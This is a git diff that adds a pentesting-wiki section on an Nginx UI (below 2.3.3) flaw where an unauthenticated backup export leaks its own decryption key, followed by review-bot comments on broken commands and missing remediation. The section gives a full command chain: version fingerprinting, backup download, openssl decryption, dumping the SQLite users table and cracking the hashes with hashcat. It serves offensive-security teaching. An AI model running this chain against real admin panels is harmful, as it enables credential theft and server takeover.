diff --git a/src/network-services-pentesting/pentesting-web/nginx.md b/src/network-services-pentesting/pentesting-web/nginx.md index 979580ffa27..fc04c324574 100644 --- a/src/network-services-pentesting/pentesting-web/nginx.md +++ b/src/network-services-pentesting/pentesting-web/nginx.md 
@@ -379,6 +379,59 @@ rg -n "keepalive_requests" /etc/nginx/ Hosts that reveal unusually high values for those directives are prime targets: one HTTP/2 client can loop through stream creation and instant `RST_STREAM` frames to keep CPU pegged without tripping the concurrency cap. +## Nginx UI pre-auth backup export + crypto material leakage + +**Nginx UI** is a separate admin panel for nginx, not the nginx daemon itself. In **Nginx UI < 2.3.3**, the backup export endpoint may be reachable **without authentication** and the response can also leak the **AES-256-CBC key and IV** needed to decrypt the backup via the `X-Backup-Security` header. This turns an "encrypted backup download" into immediate **credential / token / private-key disclosure**. + +### Fast version fingerprinting from SPA assets + +If the login page is a JS-heavy SPA, pull the main bundle from `/` and look for a dedicated version chunk: + +```bash +curl -s http://admin.example/ | grep -oP 'assets/index-[^"]+\.js' +curl -s http://admin.example/assets/index-.js | grep -oP 'version[-\\w]*\\.js' +curl -s http://admin.example/assets/version-.js +``` + +On vulnerable Nginx UI builds this often returns a literal such as `const t="2.3.2"`, which is enough to match the vulnerable range before authenticating. + +### Check exposed API endpoints and pull the backup + +Even when most `/api/*` routes return `403`, test backup-style endpoints directly: + +```bash +curl -s http://admin.example/api/install +curl -s -D headers.txt -o backup.zip http://admin.example/api/backup +grep -i '^X-Backup-Security:' headers.txt +unzip -l backup.zip +``` + +If vulnerable, `X-Backup-Security` contains `base64(key):base64(iv)`. 
Decode both values and confirm the expected lengths (**32-byte key**, **16-byte IV**): + +```bash +KEY_B64=''; IV_B64='' +KEY_HEX=$(printf '%s' "$KEY_B64" | base64 -d | xxd -p -c 0) +IV_HEX=$(printf '%s' "$IV_B64" | base64 -d | xxd -p -c 0) +unzip backup.zip -d backup +openssl enc -aes-256-cbc -d -in backup/hash_info.txt -out hash_info.txt -K "$KEY_HEX" -iv "$IV_HEX" +openssl enc -aes-256-cbc -d -in backup/nginx.zip -out nginx_dec.zip -K "$KEY_HEX" -iv "$IV_HEX" +openssl enc -aes-256-cbc -d -in backup/nginx-ui.zip -out nginx-ui_dec.zip -K "$KEY_HEX" -iv "$IV_HEX" +``` + +After decryption, inspect the recovered nginx configs and the Nginx UI application data. A common post-exploitation path is: + +- Extract reverse-proxy and vhost details from `nginx_dec.zip` +- Inspect `nginx-ui_dec.zip` for `app.ini`, `database.db`, API tokens, or certificate material +- Dump the SQLite `users` table and crack recovered password hashes offline + +```bash +unzip nginx-ui_dec.zip -d nginx-ui +sqlite3 nginx-ui/database.db 'select name,password from users;' +hashcat -m 3200 hashes.txt +``` + +This pattern is worth testing in other admin products too: **an unauthenticated "encrypted" export is still plaintext disclosure if the response leaks the decryption material or stores it alongside the archive.** + ## Try it yourself Detectify has created a GitHub repository where you can use Docker to set up your own vulnerable Nginx test server with some of the misconfigurations discussed in this article and try finding them yourself! 
@@ -405,6 +458,9 @@ Nginxpwner is a simple tool to look for common Nginx misconfigurations and vulne - [**https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html**](https://mailman.nginx.org/pipermail/nginx-announce/2024/GWH2WZDVCOC2A5X67GKIMJM4YRELTR77.html) - [**https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html**](https://mailman.nginx.org/pipermail/nginx-announce/2025/NYEUJX7NCBCGJGXDFVXNMAAMJDFSE45G.html) - [**https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products**](https://www.f5.com/company/blog/nginx/http-2-rapid-reset-attack-impacting-f5-nginx-products) +- [**https://0xdf.gitlab.io/2026/04/01/htb-snapped.html**](https://0xdf.gitlab.io/2026/04/01/htb-snapped.html) +- [**https://nvd.nist.gov/vuln/detail/CVE-2026-27944**](https://nvd.nist.gov/vuln/detail/CVE-2026-27944) +- [**https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762**](https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-g9w5-qffc-6762) {{#include ../../banners/hacktricks-training.md}}
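Review bot: the version-fingerprinting block in the first hunk does not run as written: `grep -oP 'version[-\\w]*\\.js'` is inside single quotes, so PCRE receives `\\w` and `\\.`, i.e. a literal backslash followed by `w` / `.`, and it will never match a chunk name like `version-abc123.js`; it should be `grep -oP 'version[-\w]*\.js'`. The next two commands, `curl -s http://admin.example/assets/index-.js` and `curl -s http://admin.example/assets/version-.js`, use an elided bundle hash, so they 404 unless the reader substitutes the name returned by the first `grep`; either feed the first result into the second request with a variable or state explicitly that the placeholder must be filled in. The same applies to `KEY_B64=''; IV_B64=''` in the decryption block, which are empty and should be documented as the two values taken from the `X-Backup-Security` header. Finally, the section states `Nginx UI < 2.3.3` but never says that the remediation is upgrading to 2.3.3 or later and keeping the panel off untrusted networks; one sentence on that, plus the observable signal (unauthenticated `200` responses with an `X-Backup-Security` header on `/api/backup`), would make the section usable for defenders as well.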
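Review bot: the second hunk adds the CVE-2026-27944 and GHSA-g9w5-qffc-6762 references, but the new "Nginx UI pre-auth backup export" section never cites either identifier, so a reader cannot map the `< 2.3.3` range in the text to the advisory that defines it. Suggest naming the CVE inline where the vulnerable range is stated (e.g. "In **Nginx UI < 2.3.3** (CVE-2026-27944)") so the reference entries are anchored to the section they support, matching how the existing HTTP/2 rapid-reset text pairs its claims with the mailman and F5 links.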